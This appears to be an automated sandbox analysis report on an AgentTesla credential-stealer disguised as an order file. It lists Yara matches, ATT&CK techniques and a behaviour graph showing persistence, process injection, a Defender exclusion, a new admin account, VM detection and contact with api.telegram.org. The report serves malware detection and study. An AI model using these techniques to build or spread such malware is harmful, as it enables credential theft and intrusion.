                      Source: Yara matchFile source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: #NEW ORDER FOR JANUARY 2022.exe PID: 6588, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 7068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4876, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6712, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 4588, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.42c5920.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.470db20.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.42a5900.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.46edb00.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.42c5920.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.svchost.exe.4aadb00.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.svchost.exe.4aedb20.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4305940.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.474db40.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.svchost.exe.4aadb00.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.470db20.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.svchost.exe.4aedb20.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.474db40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4416ba0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4305940.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000003B.00000000.888165359.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000000.710933564.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000000.788423328.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.744599446.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000000.710472370.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.931530989.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000000.784941162.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000000.790295907.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.744014270.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000000.710080019.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000000.817068526.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000000.786765310.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000000.709643389.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003B.00000000.890224140.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003B.00000000.885768767.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.931661414.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.746142761.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.779987071.000000000474D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.842251291.0000000004AED000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.927080316.0000000004715000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000000.845760653.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003B.00000000.883261997.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003B.00000002.932852897.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000000.814526101.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000000.843348334.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.886344519.0000000003C5D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000000.847213598.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000000.815839505.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.734261757.000000000428D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000000.818834012.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.911408277.000000000413D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000000.840897044.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000002.931663085.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000002.931619495.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.909583647.00000000040C5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.871462494.00000000038F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.754034850.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.927142303.000000000478D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.3.#NEW ORDER FOR JANUARY 2022.exe.4eab090.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.#NEW ORDER FOR JANUARY 2022.exe.4e74670.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000003B.00000002.938179182.0000000002471000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.927387694.00000000049D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000003.773583087.0000000004B9C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000002.938786458.0000000003511000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000003.829188638.00000000043CE000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000003.778067403.0000000004B45000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.705890791.0000000004E74000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000002.938600597.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.937902584.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: #NEW ORDER FOR JANUARY 2022.exe PID: 6588, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 7068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4876, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6712, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 4588, type: MEMORYSTR
                      Source: Yara matchFile source: 0000003B.00000002.938179182.0000000002471000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000002.938786458.0000000003511000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000002.938600597.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.937902584.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 7068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 4588, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4416ba0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4305940.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000003B.00000002.938179182.0000000002471000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000002.938786458.0000000003511000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.911408277.000000000413D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000002.938600597.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.937902584.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.871462494.00000000038F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.927142303.000000000478D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: #NEW ORDER FOR JANUARY 2022.exe PID: 6588, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 7068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4876, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6712, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 4588, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.42c5920.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.470db20.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.42a5900.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.46edb00.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.42c5920.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.svchost.exe.4aadb00.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.svchost.exe.4aedb20.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4305940.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.474db40.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.svchost.exe.4aadb00.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.470db20.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.svchost.exe.4aedb20.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.474db40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4416ba0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4305940.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000003B.00000000.888165359.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000000.710933564.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000000.788423328.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.744599446.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000000.710472370.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.931530989.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000000.784941162.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000000.790295907.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.744014270.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000000.710080019.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000000.817068526.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000000.786765310.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000000.709643389.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003B.00000000.890224140.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003B.00000000.885768767.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.931661414.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.746142761.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.779987071.000000000474D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.842251291.0000000004AED000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.927080316.0000000004715000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000000.845760653.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003B.00000000.883261997.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003B.00000002.932852897.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000000.814526101.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000000.843348334.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.886344519.0000000003C5D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000000.847213598.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000000.815839505.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.734261757.000000000428D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000000.818834012.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.911408277.000000000413D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000000.840897044.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000002.931663085.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000002.931619495.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.909583647.00000000040C5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.871462494.00000000038F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.754034850.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.927142303.000000000478D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.3.#NEW ORDER FOR JANUARY 2022.exe.4eab090.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.#NEW ORDER FOR JANUARY 2022.exe.4e74670.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000003B.00000002.938179182.0000000002471000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.927387694.00000000049D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000003.773583087.0000000004B9C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000002.938786458.0000000003511000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000003.829188638.00000000043CE000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000003.778067403.0000000004B45000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.705890791.0000000004E74000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000002.938600597.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.937902584.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: #NEW ORDER FOR JANUARY 2022.exe PID: 6588, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 7068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4876, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6712, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 4588, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Create Account1Process Injection212Disable or Modify Tools11OS Credential DumpingFile and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/Job1Scheduled Task/Job1Scheduled Task/Job1Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery113Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Registry Run Keys / Startup Folder21Registry Run Keys / Startup Folder21Obfuscated Files or Information2Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing3NTDSSecurity Software Discovery321Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol1SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading221Cached Domain CredentialsVirtualization/Sandbox Evasion141VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion141DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection212Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Users1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 553020 Sample: #NEW ORDER FOR JANUARY 2022.exe Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 54 192.168.2.1 unknown unknown 2->54 56 api.telegram.org 2->56 58 Multi AV Scanner detection for submitted file 2->58 60 Yara detected UAC Bypass using CMSTP 2->60 62 Yara detected AgentTesla 2->62 64 15 other signatures 2->64 8 #NEW ORDER FOR JANUARY 2022.exe 5 6 2->8         started        12 svchost.exe 2->12         started        14 svchost.exe 2->14         started        16 2 other processes 2->16 signatures3 process4 file5 50 C:\Windows\Microsoft.NET\...\svchost.exe, PE32 8->50 dropped 52 C:\...\#NEW ORDER FOR JANUARY 2022.exe.log, ASCII 8->52 dropped 70 Creates autostart registry keys with suspicious names 8->70 72 Creates an autostart registry key pointing to binary in C:\Windows 8->72 74 Writes to foreign memory regions 8->74 76 Adds a new user with administrator rights 8->76 18 net.exe 1 8->18         started        20 aspnet_regbrowsers.exe 8->20         started        23 net.exe 1 8->23         started        29 8 other processes 8->29 78 Multi AV Scanner detection for dropped file 12->78 80 Adds a directory exclusion to Windows Defender 12->80 82 Injects a PE file into a foreign processes 12->82 25 powershell.exe 12->25         started        27 aspnet_regbrowsers.exe 12->27         started        signatures6 process7 signatures8 31 net1.exe 1 18->31         started        34 conhost.exe 18->34         started        66 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 20->66 68 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 20->68 36 conhost.exe 23->36         started        38 net1.exe 1 23->38         started        40 conhost.exe 25->40         started        42 conhost.exe 29->42         started        44 conhost.exe 29->44         started        46 conhost.exe 29->46         started        48 6 other processes 29->48 process9 signatures10 84 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 31->84 86 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 31->86

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      #NEW ORDER FOR JANUARY 2022.exe19%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe19%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      37.2.aspnet_regbrowsers.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      31.0.aspnet_regbrowsers.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                      31.0.aspnet_regbrowsers.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                      31.0.aspnet_regbrowsers.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      37.0.aspnet_regbrowsers.exe.400000.2.unpack100%AviraTR/Spy.Gen8Download File
                      31.0.aspnet_regbrowsers.exe.400000.2.unpack100%AviraTR/Spy.Gen8Download File
                      37.0.aspnet_regbrowsers.exe.400000.3.unpack100%AviraTR/Spy.Gen8Download File
